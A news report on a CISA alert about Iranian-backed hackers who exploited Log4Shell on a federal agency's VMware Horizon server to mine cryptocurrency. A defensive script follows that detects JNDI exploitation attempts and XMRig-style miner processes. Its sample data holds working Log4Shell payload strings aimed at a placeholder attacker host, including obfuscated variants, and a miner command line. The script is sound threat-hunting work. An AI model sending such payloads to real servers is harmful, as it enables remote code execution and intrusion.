Hackers backed by the Iranian regime broke into the network of a U.S. federal government agency and used that access to install cryptocurrency mining software, the Cybersecurity and Infrastructure Security Agency (CISA) said in an alert on Wednesday.

Officials first noticed evidence of advanced persistent threat (APT) activity on the agency’s network in April of this year and determined that it had been compromised since at least February. The hackers exploited a vulnerability to install XMRig crypto mining software and to compromise credentials in the network. CISA did not identify the compromised agency, but said that it was publishing the alert to “help network defenders detect and protect against related compromises.”

The Iranian-backed hackers used the Log4Shell vulnerability, first identified last December, in an unpatched VMware Horizon server. “CISA and FBI encourage all organizations with affected VMware systems that did not immediately apply available patches or workarounds to assume compromise and initiate threat hunting activities,” CISA said Wednesday.
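As an added illustration of the threat-hunting step CISA recommends, the script below is an example written for this page; it is not CISA's, VMware's or OODA's tooling. It runs two checks a defender would start with: it looks through web-server log lines for Log4Shell (JNDI lookup) exploitation attempts, and it looks through a process listing for XMRig-style miner indicators. It goes a little beyond the plain-text case by first undoing URL-encoding and the common Log4j lookup obfuscations (`${lower:}`, `${upper:}`, `${x:-y}`), so the same pattern catches disguised variants. All log lines, process lines, hostnames (`attacker.example`, `pool.example`) and file paths are constructed placeholders.

```python
import re
from urllib.parse import unquote

# Constructed sample web-server log lines; none come from the CISA alert.
# attacker.example and the request paths are placeholders.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [12/Feb/2022:03:14:07 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Feb/2022:03:15:22 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [12/Feb/2022:03:16:01 +0000] "GET /portal/?q=%24%7B%6Andi%3Aldap%3A%2F%2Fattacker.example%2Fb%7D HTTP/1.1" 400 0 "-" "curl/7.79"',
    '10.0.0.9 - - [12/Feb/2022:03:17:45 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:${::-l}${::-d}ap://attacker.example/c}"',
    '10.0.0.7 - - [12/Feb/2022:03:20:00 +0000] "GET /docs/${version}.html HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

# Constructed process listing (user, pid, command line); binary paths and the pool host are placeholders.
SAMPLE_PROCESS_LINES = [
    "root 1201 /usr/sbin/sshd -D",
    "horizon 4410 /usr/lib/jvm/bin/java -Xmx2g -jar horizon.jar",
    "horizon 5123 /tmp/.x/xmrig -o stratum+tcp://pool.example:3333 -u WALLETPLACEHOLDER --donate-level 1",
    "horizon 5130 /tmp/.x/kworkerd --url=pool.example:4444 --coin=monero --background",
]

# Log4j lookup forms commonly used to disguise the "jndi" keyword, and how each resolves.
LOOKUP_PATTERNS = [
    (re.compile(r"\$\{lower:([^{}]*)\}", re.I), lambda m: m.group(1).lower()),
    (re.compile(r"\$\{upper:([^{}]*)\}", re.I), lambda m: m.group(1).upper()),
    (re.compile(r"\$\{[^{}]*?:-([^{}]*)\}"), lambda m: m.group(1)),  # ${key:-default} -> default
]

JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.I)

# Indicators typical of XMRig-style miners in a command line (constructed list, not from the alert).
MINER_INDICATORS = {
    "xmrig binary name": re.compile(r"\bxmrig\b", re.I),
    "stratum pool URL": re.compile(r"stratum\+(?:tcp|ssl)://", re.I),
    "xmrig donate flag": re.compile(r"--donate-level\b", re.I),
    "monero coin flag": re.compile(r"--coin[= ]monero\b", re.I),
    "executable under /tmp": re.compile(r"\s/tmp/\S+"),
}


def normalize(text, max_rounds=10):
    """Undo URL-encoding and nested lookup obfuscation until the text stops changing.

    The round limit keeps pathological input from looping forever.
    """
    for _ in range(max_rounds):
        before = text
        text = unquote(text)
        for pattern, repl in LOOKUP_PATTERNS:
            text = pattern.sub(repl, text)
        if text == before:
            break
    return text


def find_log4shell_attempts(lines):
    """Return (line index, normalized line) for every line carrying a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        norm = normalize(line)
        if JNDI_RE.search(norm):
            hits.append((i, norm))
    return hits


def find_miner_processes(process_lines):
    """Return (line index, list of matched indicator names) for suspicious processes."""
    flagged = []
    for i, line in enumerate(process_lines):
        matched = [name for name, pat in MINER_INDICATORS.items() if pat.search(line)]
        if matched:
            flagged.append((i, matched))
    return flagged


if __name__ == "__main__":
    for i, norm in find_log4shell_attempts(SAMPLE_LOG_LINES):
        print(f"[log4shell] log line {i}: {norm}")
    for i, names in find_miner_processes(SAMPLE_PROCESS_LINES):
        print(f"[miner] process line {i}: {', '.join(names)}")
```

On the constructed input the script flags three of the five log lines (the plain, URL-encoded and lookup-obfuscated JNDI attempts) while leaving the harmless `${version}` line alone, and two of the four processes. A real hunt would run the same normalization over the Horizon and Log4j application logs rather than just the front-end access log, and would treat any miner hit as a sign to look for the credential compromise the alert describes, not just to kill the process.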
About OODA Analyst
OODA is comprised of a unique team of international experts capable of providing advanced intelligence and analysis, strategy and planning support, risk and threat management, training, decision support, crisis response, and security services to global corporations and governments.